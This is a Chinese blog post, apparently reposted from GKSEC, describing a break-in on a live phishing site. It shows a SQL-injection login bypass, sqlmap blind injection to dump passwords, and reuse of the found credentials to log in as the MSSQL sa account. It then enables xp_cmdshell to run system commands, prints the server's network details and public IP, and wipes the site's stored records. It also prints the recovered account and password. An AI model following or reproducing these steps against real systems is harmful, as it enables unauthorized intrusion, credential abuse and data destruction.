小学生钓鱼网站渗透实战

yoelike 2025-04-11 0 11 次浏览未分类 tap-windows adapter v9

前言

偶然间发现一个钓鱼站点，随便搞搞看。

首先看一下action地址，进去转了一圈，发现不是后台，没意思。

接着就上扫描器，扫了一圈啥也没有。

最后扫下端口，有惊喜了，看这个界面，基本就是弱智后台，直接万能密码淦。

' or 1='1
' or 1='1

好的进了后台了，然后找到了真实账号密码。

903998876
li158669

好的，进了后台就完了？当然是想办法拿到shell再说，后台肯定有注入，先拿去sqlmap跑一下POST注入。

果然有，直接就出来了，问题就在于，居然时间盲注，太费时间了。

扫端口，发现开放1433，就想着sa进去，索性跑一下密码。

sqlmap -r sql.txt --passwords

在漫长的盲注等待期间，我试了一下上面拿到的密码尝试了一下。

sa/li158669

于是就进去了，服务器没开xp_cmdshell，所以我们帮他开启一下。

exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'xp_cmdshell',1
reconfigure

好了能执行cmd命令了，首先whoami一下。

nt service\mssqlserver

再ipconfig一下

Windows IP 配置

主机名 . . . . . . . . . . . . . : ebs-48474
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否

以太网适配器本地连接 2:

连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter #2
物理地址. . . . . . . . . . . . . : 52-54-00-97-D6-EC
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . :
fe80::396f:c860:10bf:a68e%13(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.223.179(首选)
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 307385344
DHCPv6 客户端 DUID . . . . . . . :
00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19
DNS 服务器 . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter
物理地址. . . . . . . . . . . . . : 52-54-00-9C-3D-19
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . :
fe80::c111:6e76:9e15:cc4f%11(首选)
IPv4 地址 . . . . . . . . . . . . : 211.149.223.179(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 211.149.223.1
DHCPv6 IAID . . . . . . . . . . . : 240276480
DHCPv6 客户端 DUID . . . . . . . :
00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19
DNS 服务器 . . . . . . . . . . . : 223.5.5.5
114.114.114.114
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{
F62CBCB3-434F-456D-B57D-E07EF3C5621C}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用

再netstat -an一下

活动连接

协议本地地址外部地址状态

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:987 0.0.0.0:0 LISTENING
TCP 0.0.0.0:988 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING
TCP 0.0.0.0:33890 0.0.0.0:0 LISTENING
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49291
TCP 192.168.223.179:139 0.0.0.0:0 LISTENING
TCP 211.149.223.179:139 0.0.0.0:0 LISTENING

我对服务器并不感兴趣，就懒得上他服务器玩玩了，远程桌面应该就是端口就是33890。

既然来过了，顺带清空了后台记录的账号密码。

“轻轻地我走了，正如我轻轻地来，挥一挥手，不带走一片云彩”

转载于GKSEC博客

原文链接：小学生钓鱼网站渗透实战，转发请注明来源！

里克资源网 › 未分类 › 小学生钓鱼网站渗透实战